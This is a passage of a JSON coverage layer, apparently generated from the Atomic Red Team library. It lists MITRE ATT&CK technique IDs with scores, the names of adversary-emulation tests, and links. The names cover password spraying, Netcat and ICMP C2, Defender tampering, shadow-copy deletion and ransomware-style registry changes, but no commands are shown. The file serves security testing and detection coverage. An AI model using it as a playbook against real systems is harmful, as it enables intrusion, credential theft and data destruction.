Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":22,"enabled":true,"comment":"\n- Enumerate all accounts (Domain)\n- Enumerate all accounts via PowerShell (Domain)\n- Enumerate logged on users via CMD (Domain)\n- Automated AD Recon (ADRecon)\n- Adfind -Listing password policy\n- Adfind - Enumerate Active Directory Admins\n- Adfind - Enumerate Active Directory User Objects\n- Adfind - Enumerate Active Directory Exchange AD Objects\n- Enumerate Default Domain Admin Details (Domain)\n- Enumerate Active Directory for Unconstrained Delegation\n- Get-DomainUser with PowerView\n- Enumerate Active Directory Users with ADSISearcher\n- Enumerate Linked Policies In ADSISearcher Discovery\n- Enumerate Root Domain linked policies Discovery\n- WinPwn - generaldomaininfo\n- Kerbrute - userenum\n- Wevtutil - Discover NTLM Users Remote\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties\n- Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property\n- Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope\n- Suspicious LAPS Attributes Query with adfind all properties\n- Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- portproxy reg key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":2,"enabled":true,"comment":"\n- Psiphon\n- Tor Proxy Usage - Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"comment":"\n- USB Malware Spread Simulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"comment":"\n- ICMP C2\n- Netcat C2\n- Powercat C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":10,"enabled":true,"comment":"\n- Admin Account Manipulate\n- Domain Account and Group Manipulate\n- Password Change on Directory Service Restore Mode (DSRM) Account\n- Domain Password Policy Check: Short Password\n- Domain Password Policy Check: No Number in Password\n- Domain Password Policy Check: No Special Character in Password\n- Domain Password Policy Check: No Uppercase Character in Password\n- Domain Password Policy Check: No Lowercase Character in Password\n- Domain Password Policy Check: Only Two Character Classes\n- Domain Password Policy Check: Common Password Use\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":21,"enabled":true,"comment":"\n- certutil download (urlcache)\n- certutil download (verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":4,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":57,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":3,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with Sysinternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":2,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment 